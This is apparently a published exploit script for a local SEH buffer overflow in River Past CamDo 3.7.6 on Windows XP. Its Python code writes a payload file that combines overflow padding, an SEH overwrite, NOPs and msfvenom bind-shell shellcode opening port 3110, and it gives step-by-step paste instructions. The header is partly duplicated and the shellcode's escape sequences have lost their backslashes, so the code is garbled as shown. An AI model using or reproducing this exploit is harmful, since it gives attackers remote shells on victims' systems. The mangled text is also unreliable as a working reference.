# Exploit Title: River Past CamDo SEH Local Exploit
# Date: 07.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/p # Exploit Title: River Past CamDo SEH Local Exploit
# Date: 07.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Exploit Author: Achilles
# Tested Version: 3.7.6
# Tested on: Windows XP SP3 EN

# 1.- Run python code : CamDo.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open CamDo.exe and click on the 'Options' Inside fhe 'File' Menu.
# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK' and you will have a bind shell port 3110.


#!/usr/bin/env python
import struct

buffer = "x41" * 280
NSEH = "xebx06x90x90" #jmp short 6
SEH = struct.pack('<L',0x10010b0b) #pop pop ret rvddshow2.dll
nops = "x90" * 20

#badchar x00x0ax0dx2f
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -a x86 -b 'x00x0ax0dx2f' -f python

shellcode = ("xb8x9cx94x39x34xdbxdaxd9x74x24xf4x5ax33"
"xc9xb1x53x31x42x12x03x42x12x83x5ex90xdb"
"xc1xa2x71x99x2ax5ax82xfexa3xbfxb3x3exd7"
"xb4xe4x8ex93x98x08x64xf1x08x9ax08xdex3f"
"x2bxa6x38x0exacx9bx79x11x2exe6xadxf1x0f"
"x29xa0xf0x48x54x49xa0x01x12xfcx54x25x6e"
"x3dxdfx75x7ex45x3cxcdx81x64x93x45xd8xa6"
"x12x89x50xefx0cxcex5dxb9xa7x24x29x38x61"
"x75xd2x97x4cxb9x21xe9x89x7exdax9cxe3x7c"
"x67xa7x30xfexb3x22xa2x58x37x94x0ex58x94"
"x43xc5x56x51x07x81x7ax64xc4xbax87xedxeb"
"x6cx0exb5xcfxa8x4ax6dx71xe9x36xc0x8exe9"
"x98xbdx2ax62x34xa9x46x29x51x1ex6bxd1xa1"
"x08xfcxa2x93x97x56x2cx98x50x71xabxdfx4a"
"xc5x23x1ex75x36x6axe5x21x66x04xccx49xed"
"xd4xf1x9fx98xdcx54x70xbfx21x26x20x7fx89"
"xcfx2ax70xf6xf0x54x5ax9fx99xa8x65x93x7f"
"x24x83xc1x6fx60x1bx7dx52x57x94x1axadxbd"
"x8cx8cxe6xd7x0bxb3xf6xfdx3bx23x7dx12xf8"
"x52x82x3fxa8x03x15xb5x39x66x87xcax13x10"
"x24x58xf8xe0x23x41x57xb7x64xb7xaex5dx99"
"xeex18x43x60x76x62xc7xbfx4bx6dxc6x32xf7"
"x49xd8x8axf8xd5x8cx42xafx83x7ax25x19x62"
"xd4xffxf6x2cxb0x86x34xefxc6x86x10x99x26"
"x36xcdxdcx59xf7x99xe8x22xe5x39x16xf9xad"
"x4ax5dxa3x84xc2x38x36x95x8exbaxedxdaxb6"
"x38x07xa3x4cx20x62xa6x09xe6x9fxdax02x83"
"x9fx49x22x86")


payload = buffer + NSEH + SEH + nops + shellcode


try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"